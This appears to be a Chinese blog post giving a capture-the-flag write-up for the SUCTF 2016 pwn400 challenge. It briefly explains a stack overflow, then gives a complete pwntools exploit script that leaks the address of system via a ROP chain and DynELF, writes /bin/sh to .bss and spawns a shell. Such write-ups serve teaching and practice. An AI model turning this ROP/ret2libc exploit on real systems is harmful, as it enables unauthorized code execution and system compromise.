Chybeta

SUCTF-2016-pwn400-writeup

SUCTF-2016-pwn400-writeup

IDA看,程序流程简单,有明显栈溢出漏洞。

无libc,无canary等保护。基本的思路如下:

  • 构造ROP链
  • 泄露system地址
  • 往bss段写入/bin/sh
  • 调用system

最后的exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
p = process("./simple")
elf = ELF("./simple")
offset = 40
pop_rdi_ret_addr = 0x00000000004006c3
pop_rsi_pop_r15_ret = 0x00000000004006c1
start_addr = elf.symbols['_start']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
main_addr = elf.symbols['main']
bss_addr = elf.bss() + 0x18
def leak(address):
log.info("leak address => {}".format(hex(address)))
p.recvuntil('luck!\n')
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(1)
payload += p64(pop_rsi_pop_r15_ret)
payload += p64(address)
payload += p64(1)
payload += p64(write_plt)
payload += p64(main_addr)
p.sendline(payload)
address = p.recv(8)
return address
d = DynELF(leak,elf = elf)
system_addr = d.lookup('system','libc')
log.success("system address => {}".format(hex(system_addr)))
payload = 'a' * offset
payload += p64(start_addr)
p.sendline(payload)
p.recvuntil('luck!\n')
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(0)
payload += p64(pop_rsi_pop_r15_ret)
payload += p64(bss_addr)
payload += p64(1)
payload += p64(read_plt)
payload += p64(main_addr)
p.sendline(payload)
payload = '/bin/sh\x00'
p.send(payload)
p.recvuntil('luck!\n')
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(bss_addr)
payload += p64(system_addr)
p.sendline(payload)
p.interactive()

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:SUCTF-2016-pwn400-writeup

文章作者:chybeta

发布时间:2017年06月28日 - 14:06

最后更新:2017年07月28日 - 15:07

原始链接:http://chybeta.github.io/2017/06/28/SUCTF-2016-pwn400-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。